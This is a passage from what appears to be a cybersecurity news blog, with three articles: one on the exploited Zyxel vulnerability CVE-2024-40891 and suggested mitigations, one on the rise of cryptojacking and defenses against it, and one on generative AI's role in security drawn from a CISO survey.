Researchers noted that CVE-2024-40891 shares similarities with another Zyxel vulnerability, CVE-2024-40890, which also involves authentication and command injection exploits. The key difference is that CVE-2024-40891 is exploited via telnet, while CVE-2024-40890 is HTTP-based. This latest vulnerability follows a recent warning from the Cybersecurity and Infrastructure Security Agency (CISA) and German authorities about another security flaw in Zyxel firewalls, CVE-2024-11667, which was exploited to deploy Helldown ransomware in early December.

Mitigation Strategies and Recommendations

With no official patch available, Zyxel users remain vulnerable to exploitation. Security experts urge organizations to implement temporary mitigation strategies to reduce the risk of compromise. Key recommendations include:

  1. Monitor Network Traffic: Closely monitor network traffic for unusual activity, particularly on devices running Zyxel CPE Series firmware.
  2. Restrict Access: Limit access to potentially affected devices by disabling unnecessary services, such as telnet, and implementing strict access controls.
  3. Apply Workarounds: If possible, apply any available workarounds or configuration changes recommended by cybersecurity experts until an official patch is released.
  4. Stay Informed: Keep track of updates from Zyxel and cybersecurity agencies like CISA for the latest information on vulnerability and mitigation measures.

A VulnCheck spokesperson confirmed that the firm is actively working with Zyxel on the disclosure process and expects to share further insights in the coming week. In the meantime, organizations are advised to remain vigilant and take proactive steps to protect their networks.

The widespread exploitation of CVE-2024-40891 highlights the critical importance of timely vulnerability disclosure and patch management. As attackers continue to target Zyxel devices, organizations must prioritize cybersecurity measures to safeguard their systems and data. While waiting for an official patch, implementing temporary mitigation strategies and staying informed about updates can help reduce the risk of exploitation. This incident serves as a reminder of the ongoing challenges in securing network devices and the need for collaboration between manufacturers, researchers, and users to address vulnerabilities effectively.

Read more »
Technology
Cryptocurrency threats Cryptojacking cyb News Technology

Cryptojacking: The Silent Cybersecurity Threat Surging in 2023

Cryptojacking, the unauthorized exploitation of an organization’s computing resources to mine cryptocurrency, has emerged as a significant yet often overlooked cybersecurity threat. Unlike ransomware, which overtly disrupts operations, cryptojacking operates covertly, leading to substantial financial and operational impacts. In 2023, cryptojacking attacks surged by 659%, totaling 1.1 billion incidents, according to SonicWall’s 2024 Cyber Threat Report.

This dramatic increase underscores the growing appeal of cryptojacking among cybercriminals. The financial implications for businesses are severe. Research indicates that for every dollar’s worth of cryptocurrency mined illicitly, companies incur approximately USD 53 in cloud service costs. This disparity highlights the hidden expenses organizations face when their systems are compromised for unauthorized mining activities.

How Cryptojacking Works and Its Impact

Attackers employ various methods to infiltrate systems, including:

  • Drive-by Downloads: Compromised websites automatically download mining scripts onto visitors’ devices.
  • Phishing Emails: Trick users into installing malware that enables cryptojacking.
  • Exploiting Vulnerabilities: Targeting unpatched software to gain unauthorized access.

The rise of containerized environments has also provided new avenues for attackers. For example, cybercriminals can embed mining scripts within public repository images or target exposed Docker APIs to deploy cryptojacking malware.

Beyond financial losses, cryptojacking degrades system performance by overutilizing CPU and GPU resources. This leads to slower operations, reduced productivity, and increased energy consumption. Over time, the strain on hardware can cause overheating and potential equipment failure. Additionally, compromised systems are more vulnerable to further security breaches, as attackers can leverage their access to escalate attacks.

Combating Cryptojacking: Proactive Measures

To defend against cryptojacking, organizations must implement proactive security measures. Key strategies include:

  1. Endpoint Protection Tools: Deploy solutions that monitor for unusual resource usage, such as sudden spikes in CPU or GPU activity, which may indicate cryptojacking.
  2. Network Traffic Analysis: Analyze network traffic for connections to known cryptocurrency mining pools, which are often used by attackers to process mined coins.
  3. Cloud Monitoring Solutions: Utilize cloud-based tools to detect unauthorized mining activities in cloud environments, where cryptojacking is increasingly prevalent.
  4. Regular Testing and Validation: Simulate cryptojacking attacks to identify vulnerabilities and strengthen defenses before actual threats materialize.

Organizations should also prioritize employee training to recognize phishing attempts and other common attack vectors. Regularly updating and patching software can close vulnerabilities that attackers exploit to infiltrate systems. Additionally, implementing robust access controls and monitoring for unusual user activity can help prevent unauthorized access.

The surge in cryptojacking attacks highlights the growing sophistication of cybercriminals and the need for organizations to adopt comprehensive cybersecurity measures. While cryptojacking may not be as visibly disruptive as ransomware, its financial and operational impacts can be equally devastating. By deploying advanced detection tools, analyzing network traffic, and regularly testing defenses, businesses can mitigate the risks posed by cryptojacking and protect their computing resources from unauthorized exploitation. As cyber threats continue to evolve, proactive and adaptive security strategies will be essential to safeguarding organizational assets and maintaining operational efficiency.

Read more »
trending news
AI cybersecurity Emerging tech news Generative AI latest news News Technology Technology News trending news

Generative AI in Cybersecurity: A Double-Edged Sword

Generative AI (GenAI) is transforming the cybersecurity landscape, with 52% of CISOs prioritizing innovation using emerging technologies. However, a significant disconnect exists, as only 33% of board members view these technologies as a top priority. This gap underscores the challenge of aligning strategic priorities between cybersecurity leaders and company boards.

The Role of AI in Cybersecurity

According to the latest Splunk CISO Report, cyberattacks are becoming more frequent and sophisticated. Yet, 41% of security leaders believe that the requirements for protection are becoming easier to manage, thanks to advancements in AI. Many CISOs are increasingly relying on AI to:

  • Identify risks (39%)
  • Analyze threat intelligence (39%)
  • Detect and prioritize threats (35%)

However, GenAI is a double-edged sword. While it enhances threat detection and protection, attackers are also leveraging AI to boost their efforts. For instance:

  • 32% of attackers use AI to make attacks more effective.
  • 28% use AI to increase the volume of attacks.
  • 23% use AI to develop entirely new types of threats.

This has led to growing concerns among security professionals, with 36% of CISOs citing AI-powered attacks as their biggest worry, followed by cyber extortion (24%) and data breaches (23%).

Challenges and Opportunities in Cybersecurity

One of the major challenges is the gap in budget expectations. Only 29% of CISOs feel they have sufficient funding to secure their organizations, compared to 41% of board members who believe their budgets are adequate. Additionally, 64% of CISOs attribute the cyberattacks their firms experience to a lack of support.

Despite these challenges, there is hope. A vast majority of cybersecurity experts (86%) believe that AI can help attract entry-level talent to address the skills shortage, while 65% say AI enables seasoned professionals to work more productively. Collaboration between security teams and other departments is also improving:

  • 91% of organizations are increasing security training for legal and compliance staff.
  • 90% are enhancing training for security teams.

To strengthen cyber defenses, experts emphasize the importance of foundational practices:

  1. Strong Passwords and MFA: Poor password security is linked to 80% of data breaches. Companies are encouraged to use password managers and enforce robust password policies.
  2. Regular Cybersecurity Training: Educating employees on risk management and security practices, such as using antivirus software and maintaining firewalls, can significantly reduce vulnerabilities.
  3. Third-Party Vendor Assessments: Organizations must evaluate third-party vendors for security risks, as breaches through these channels can expose even the most secure systems.

Generative AI is reshaping the cybersecurity landscape, offering both opportunities and challenges. While it enhances threat detection and operational efficiency, it also empowers attackers to launch more sophisticated and frequent attacks. To navigate this evolving landscape, organizations must align strategic priorities, invest in AI-driven solutions, and reinforce foundational cybersecurity practices. By doing so, they can better protect their systems and data in an increasingly complex threat environment.

Read more »
Subscribe to: Posts (Atom)